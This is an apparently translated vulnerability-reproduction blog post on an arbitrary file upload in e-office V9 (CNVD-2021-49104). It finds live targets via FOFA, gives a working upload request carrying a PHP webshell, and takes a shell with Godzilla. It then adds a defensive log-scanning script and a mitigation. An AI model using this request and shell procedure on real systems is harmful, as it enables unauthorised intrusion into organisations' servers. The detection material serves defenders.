Upload an e-office V9 arbitrary file [vulnerability recurrence practice]
2022-07-07 08:37:00 【It old culvert】
One. Preface
Any direct or indirect consequences or losses caused by spreading or using the information provided in this article are the sole responsibility of the user; the author of this article takes no responsibility for them.
The vulnerabilities in this article are all collected from public sources. If any content in the article touches sensitive material or has an impact, please contact the author in time; your understanding is appreciated.
Two. Vulnerability principle
The vulnerability reproduced here is CNVD-2021-49104, an undisclosed vulnerability. It exists because the upload module of e-office does not properly handle user-controlled input, so an attacker can construct a malicious upload request and achieve arbitrary code execution.
The following figure shows the code snippet related to the vulnerability.

Figure 1: Vulnerability code snippet
The vulnerable code path is reached when the uploadType parameter is set to eoffice_logo: in that branch the uploaded file is not validated at all, which results in arbitrary file upload.
Three. Vulnerability reproduction practice
1. Information gathering
Use FOFA to collect web sites running e-office.

Figure 2: FOFA information gathering
2. Select the reproduction target
Take the XX website as an example.

Figure 3: OA E-office interface
3. Construct the POC
Capture the request with Burp Suite and modify it. The request is constructed as follows.
POC:
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 127.0.0.1:7899
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 193
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg

<?php @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){ for($i=0;$i
Figure 4: Burp Suite modified request
Looking at the Burp response, the server echoes the file name: the file was uploaded successfully as logo-eoffice.php.
4. Verify the vulnerability and get a shell
After uploading, access the following path: http://???/images/logo/logo-eoffice.php

Figure 5: Accessing the file path
Use the Godzilla tool to connect to the shell.

Figure 6: Godzilla getshell
Run a command; it executes normally, so the shell has been obtained successfully.

Figure 7: Command execution
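From the defender's side, the chain above leaves two distinct traces in the web server access log: a POST to /general/index/UploadFile.php with uploadType=eoffice_logo, followed by requests for a .php file under /images/logo/, a directory that should only ever serve images. The following Python script is an added example (not code from the original post or from e-office) that scans constructed combined-format log lines for both stages and groups the findings by source IP; the log lines, addresses and timestamps are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Jul/2022:08:30:01 +0800] "GET /general/login.php HTTP/1.1" 200 5120
203.0.113.5 - - [07/Jul/2022:08:30:09 +0800] "POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1" 200 18
203.0.113.5 - - [07/Jul/2022:08:30:15 +0800] "GET /images/logo/logo-eoffice.php HTTP/1.1" 200 0
203.0.113.5 - - [07/Jul/2022:08:30:16 +0800] "POST /images/logo/logo-eoffice.php HTTP/1.1" 200 312
198.51.100.7 - - [07/Jul/2022:08:31:02 +0800] "GET /images/logo/logo-eoffice.png HTTP/1.1" 200 4096
"""

# Minimal combined-log-format parser: client IP, timestamp, method, URL, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def classify(line):
    """Return a finding tag for a suspicious request, or None for benign lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("url"))
    path = url.path.lower()
    params = parse_qs(url.query)
    # Stage 1: the logo upload endpoint hit with the unvalidated uploadType branch.
    if (m.group("method") == "POST"
            and path.endswith("/general/index/uploadfile.php")
            and "eoffice_logo" in params.get("uploadType", [])):
        return "UPLOAD_ATTEMPT"
    # Stage 2: a PHP file requested from the logo directory, which should hold only images.
    if path.startswith("/images/logo/") and path.endswith(".php"):
        return "WEBSHELL_ACCESS"
    return None

def scan(log_text):
    """Map each source IP to the sorted set of stages seen; both stages means high confidence."""
    findings = {}
    for line in log_text.splitlines():
        tag = classify(line)
        if tag:
            ip = LOG_RE.match(line).group("ip")
            findings.setdefault(ip, set()).add(tag)
    return {ip: sorted(tags) for ip, tags in findings.items()}

if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG).items():
        print(ip, tags)
```

Stage 2 alone is worth alerting on even without the upload request in view, since no legitimate deployment needs PHP executed out of the logo directory; blocking script execution for /images/ at the web server layer removes that path regardless of how the file got there.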
Four. Summary
This article briefly introduced the principle of the vulnerability and completed a reproduction exercise.